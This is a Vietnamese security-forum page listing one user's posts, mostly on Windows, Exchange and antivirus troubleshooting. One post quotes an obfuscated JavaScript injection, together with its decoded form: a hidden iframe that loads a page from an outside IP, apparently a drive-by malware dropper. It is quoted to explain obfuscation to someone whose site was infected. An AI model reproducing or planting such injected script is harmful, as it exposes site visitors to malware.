banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: cocondihoc  XML
Profile for cocondihoc Messages posted by cocondihoc [ number of posts not being displayed on this page: 5 ]
 

suxanero wrote:


giờ mà vào network admin thì cũng khó, dba sys cũng không tới nơi, coder thì lại không thích hẳn.

 

Tôi dám chắc là bạn làm gì cũng sẽ chán vì tôi chưa thấy bạn thích cái gì. Khi không thích thì gặp khó, gặp khổ chắc chắn bạn sẽ nản.

danglv19 wrote:
Chào mọi người, Web công ty em bị hack. Vì nghi là của đối thủ cạnh tranh hack nên ông sếp kêu em đi dò coi IP nào. Hic, em không rành về Secure lắm. Mọi người có cách nào không giúp mình với.
Web: nano.vn  

Đã đi hack thì chả ai dại gì mà dùng IP của mình cả. Bạn có tìm được IP thì cũng chả biết được gì.

Ky0shir0 wrote:
Vào HVA: https://www.hvaonline.net/
Click Forum ra cái này hoài: https://www.hvaonline.net/null/
Phải dùng Google tìm cái link nào đó trong HVA forums mới vào được. Vì sao thế nhỉ? 


Tôi dùng IE 10 cũng bị tương tự, của tôi không có chữ s gì hết. Cứ phải paste link của một bài viết cụ thể mới vào được. Vào bằng Chrome hay FF thì không sao.
Tôi đang gặp vấn đề thế này, nghĩ mãi mà chưa hiểu nguyên nhân ở đâu??
Mail server Exchange 2003. Name: mail.domain.com.vn, Public IP: 123.456.789.1 (tạm đặt vậy) Private IP: 10.0.0.244
Mail client Outlook Express setup incoming và outgoing mail: mail.domain.com.vn thi thoảng lại không gửi mail đi được, báo lỗi:
Your server has unexpectedly terminated the connection. Possible causes for this include server problems, network problems, or a long period of inactivity. Account:'{account name}' , Server:'mail.domain.com.vn' , Protocol: SMTP, Port: 25, Secure(SSL): No, Error Number: 0x800CCC0F
Đã kiểm tra:
- nslookup mail.domain.com.vn vẫn ra 123.456.789.1
- trong outgoing mail đặt :mail.domain.com.vn hoặc public IP 123.456.789.1 thì cũng vẫn báo lỗi trên
- trong outgoing mail đặt địa chỉ private IP (10.0.0.244) thì ok
- Từ bên ngoài công ty gửi đi ngon lành
- mail từ ngoài gửi vào vẫn ngon lành
Mà điều đáng nói là thi thoảng lại bị, một lúc rồi lại hết.
Không hiểu nguyên nhân ở đâu nhỉ??
Hôm nay tôi đang gặp vấn đề y hệt thế này (mà thi thoảng mới bị vài hôm rồi lại hết) search thử thì tìm được topic này. Tuy nhiên đọc mãi mà vẫn chưa thấy ai chỉ ra được nguyên nhân chính xác là gì (mặc dù topic lập từ 2006). Không biết đến giờ đã ai tìm hiểu được nguyên nhân chưa nhỉ?

No.13 wrote:
Bạn đã join computer vào domain thì không thể modify các Local security policy được nữa (do các policy này đã được thiết lập ở mức domain). Bạn thử dùng Domain Security Policy xem. 

Mình đã thử với 2 máy khác cũng đã join vào domain (không bị tình trạng đó, một máy là XP sp2, một máy XP sp3) thì vẫn có thể modify local security policy bình thường khi logon vào local bằng account administrator. Và vì không phải máy nào cũng bị, chỉ bị trên một số máy nên có thể nói là bị dính virus (thực tế thì vẫn đang bị lây lan nhưng tốc độ chậm). Qua đó mình nghi rằng có sự can thiệp của virus vào policy (remove group users khỏi policy, lock policy). Mình muốn tìm hiểu xem nó đã can thiệp những gì nhưng khổ nỗi các user cần máy để làm việc do đó chưa thể dùng máy của họ để làm "mẫu vật" được.
Tôi gặp phải vài máy bị tình trạng như sau:
Sau khi logon vào domain, muốn tắt máy, click Turn Off Computer thì chỉ hiện ra duy nhất một lựa chọn Log off (bình thường sẽ có thêm restart, shutdown) nên không thể shutdown máy được. Sau khi kiểm tra group policies (logon bằng local administrator) thì thấy group userspower users bị remove khỏi policy "Shutdown the system" (chỉ còn group Backup Operators, Administrator và xuất hiện thêm *S-1-24-549 và *S-1-24-550) trong Computer Configuration\Windows settings\Security settings\Local policies\User rights assignment. Đồng thời policy đó cũng bị lock luôn (mờ đi và không chỉnh sửa được). Không chỉ có 1 policy đó mà rất nhiều policy khác cũng bị lock như vậy. Tôi đã dùng KAV, Symantec để scan virus nhưng cũng không phát hiện ra gì và không giải quyết được vấn đề.
Bây giờ làm sao để có thể chỉ được policy đó để add group users vào?? Mong được chỉ giáo.
Chính xác là đã bị nhiễm virus rồi còn gì nữa. Có lẽ là đã bị bơm thêm một đoạn mã độc rồi.
Tôi nghĩ là anh nhân viên đó nói thật. Với cách làm đó thì có lẽ vấn đề ở chỗ 2 đường truyền của 2 ISP khác nhau.

TheShinichi wrote:

mR.Bi wrote:
1. Tại sao phải sang tận "trời Tây" để thuê trong khi ở VN dịch vụ này nhan nhản? 


Các nhà cung cấp ở VN, tôi không tin tưởng ai cả ! (Ý kiến chủ quan thôi)
 

Mấy thằng Tây thì cũng chắc gì tin được. Thuê ở VN lỡ có mệnh hệ gì thì còn đến tìm nó mà đập cho trận được chứ nếu là mấy thằng Tây, đi tìm được nó thì cũng chết rồi, mà nếu có tìm được thì có khi còn bị nó đập lại ý chứ.
Hỏi thằng thằng hacker đó xem sao: cyb3rking@msn.com smilie
Tôi có một virus server cài symantec 10.x và khoảng 200 client. Sau khi cài đặt, mọi thứ hoạt động bình thường, ngon ngẻ một thời gian khá dài. Nhưng thời gian gần đây server không auto update được nữa. Tôi kiểm tra thì thấy không thể access to symantec.com cũng như một số website của các hãng phần mềm virus khác như Kasper, Bitdefender,.. mặc dù các site bình thường khác thì vẫn vào bình thường. Không biết liệu có phải con virus server của tôi dính virus rồi không? Tôi đã download package và update server nhưng client vẫn không thể update được từ server. KHông hiểu nguyên nhân do đâu?
Đơn giản nhất là đặt modify password. Khi đó muốn sửa thì họ phải hỏi pass (==> biết liền)
Khi tôi click đúp vào Icon IE trên Desktop thì không mở được mà lại tạo thành 1 shortcut của IE. Nháy phải thì bật ra menu gồm: Create shortcut, Delete, Rename và Properties. Nếu vào Start\Program file thì mở được IE nhưng khi gõ địa chỉ xong, click Go thì lại bật ra một cửa sổ FF với địa chỉ như đã gõ vào IE. Ví dụ gõ vào IE "home.vnn.vn" thì lại bật ra FF và mở ra trang "home.vnn.vn".
Virus hay lỗi gì vậy các bạn?
Để hạn chế một số điểm khó chịu của vista bạn có thể tham khảo tại địa chỉ dưới
Code:
http://www.quantrimang.com.vn/hethong/thu-thuat/50290_Toi_uu_Windows_Vista_Phan_1_.aspx
 http://www.quantrimang.com.vn/hethong/thu-thuat/50343_Toi_uu_Windows_Vista_Phan_2_.aspx

No.13 wrote:
Bạn thử cấp cho domain user quyền local admistrators xem. 

Ừ, làm như vậy thì được và mình đang tạm thời dùng cách đó rồi. Nhưng như thế thì user lại có quyền cao quá, không ổn lắm. Và điều bực mình nhất là không tìm được ra chính xác nguyên nhân là gì.

tmd wrote:
Khi logon domain trên PC, rồi lại run as administrator(Local hay domain ?) để install (sẽ có vấn đề nghiêm trọng. 

bạn có thể nói rõ cái vấn đề nghiêm trọng được không. Mình thấy cái run as administrator nó thuận lợi khi cần cài đặt thêm chương trình (không cần switch user khi domain user đang logon) thậm chí còn có thể dùng cách đó để permission cho các acount. Rất thuận tiện mà!
Hôm nay tôi cũng rất hay gặp tình trạng này. Tuy nhiên bên tôi mới up ISA 2004 thành 2006 nên tôi đang băn khoăn không biết có vấn đề gì với ISA server hay không.

tmd wrote:
Nếu dùng NTFS cho ổ cứng cài lv thì phải cung cấp quyền cho user domain vào tài nguyên LV. 

Tôi cũng đã làm thế rồi, và không chỉ cấp quyền read & execute mà cấp full cũng không được luôn. Mà điều đáng nói là với những gì tôi làm (như đã nói) thì có máy được, có máy không. Vậy mới khó hiểu chứ.
Tôi gặp vấn đề thế này với lạc việc từ điển (có lincense hẳn hoi).
Khi logon local bằng user admin và cài đặt lạc việt. Cài xong chạy ngon lành. Logoff và logon bằng domain user thì không chạy được. Bị báo lỗi "can not load resource files" khi load file mtdshelf và " Exception: DbEnv::open: Operation not permitted" khi load file mtdserver. Tôi remove đi và logon domain rồi chạy run as administrator để install hoặc add domain user vào local thì trên một số máy chạy ngon lành, một số khác thì vẫn vậy. Không rõ lý do ở đâu. Ai có hướng giải quyết không chỉ dùm tôi?
Tôi cũng đã hỏi anh google rồi nhưng chỉ thấy đổ lỗi cho windows, cho setup file của lacviet,... chứ không thấy có hướng giải quyết nào cả.
Còn nhớ ông Sơn BKIS nói là "nâng cấp server" chứ đâu phỉ bị DDoS. Vậy mà bkav.com.vn lại nằm trong danh sách những site bị tấn công. Hay quá ha! Cu cậu học sinh kia thật dại quá, dám đụng đến các chuyên gia an ninh mạng. smilie
Ôi trời! Vụ này giống hệt ở công ty tôi cách đây vài tháng. Đành phải chấp nhận thôi. "Cây ngay không sợ chết đứng"==> cho nó chửi, cho nó nói xấu thoải mái. Coi như không biết gì. (Nói thì nói thế chứ nó mà đụng chạm đến mình thì cũng tức nổ mắt chứ bộ smilie )
Tôi có con laptop Fujitsu FMV-B8240 thằng em mua hàng cũ và gửi từ Nhật về. Tuy nhiên, bật máy lên thì ngay lập tức bị hỏi password như hình sau:
[img]http://farm4.static.flickr.com/3092/2910629853_4e0a2d7f5c.jpg?v=0[/img]
Tôi đã thử tháo ổ cứng ra rồi nhưng vẫn bị hỏi pass như vậy.
Nếu nhập sai 3 lần thì có thông báo fail và máy rít lên.
Có ai biết về con máy này, biết cách phá pass thì chỉ tôi với.
Thanks a lot!
Bạn thử kiểm tra lại code đi. Có thể đoạn mã độc đó được dùng kỹ thuật gọi là obfuscation để mã hóa nên bạn sẽ không thể tìm được theo những từ khóa tường minh như abc.com đâu. Trước đây tôi gặp một đoạn mã thế này:

Code:
function O10H486E2F7D05F4A(H486E2F7D06742){ function H486E2F7D06F38() {var H486E2F7D0772F=16;return H486E2F7D0772F;}
return( parseInt(H486E2F7D06742,H486E2F7D06F38()));}
function H486E2F7D07F28(H486E2F7D08729)
{ var H486E2F7D09F0A = 2; var H486E2F7D08F1C='';for(H486E2F7D09712=0; H486E2F7D09712<H486E2F7D08729.length; H486E2F7D09712+=H486E2F7D09F0A){ H486E2F7D08F1C += ( String.fromCharCode (O10H486E2F7D05F4A(H486E2F7D08729.substr(H486E2F7D09712, H486E2F7D09F0A))));}
return H486E2F7D08F1C;} document.write(H486E2F7D07F28('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3235363735292B27346264313030613833345C272077696474683D3739206865696768743D333235207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));


sau khi decode thì được đoạn như sau:

Code:
<script>if(!myia){d.write('<IFRAME name=O1
src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*25675)+'4bd100a834\' width=79
height=325 style=\'display: none\'></IFRAME >');}var myia=true;</script>



conmale ghi chú: lần sau nên đưa code vào tag code.
Tôi nghĩ là do nó đã chiếm dụng "làm của riêng" quá nhiều băng thông nên các máy khác không thể hoặc khó có thể vào mạng được nữa.
có lẽ máy của bạn bị nhiễm virus BloodHunt rồi, bạn dùng Symantec hoặc Kaspersky quét là hết. Tuy nhiên khi chạy chương trình scan virus bạn phải nhanh tay hơn virus (nó sẽ đóng ngay chương trình của bạn sau vài giây) thì mới được. Goodluck!
 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|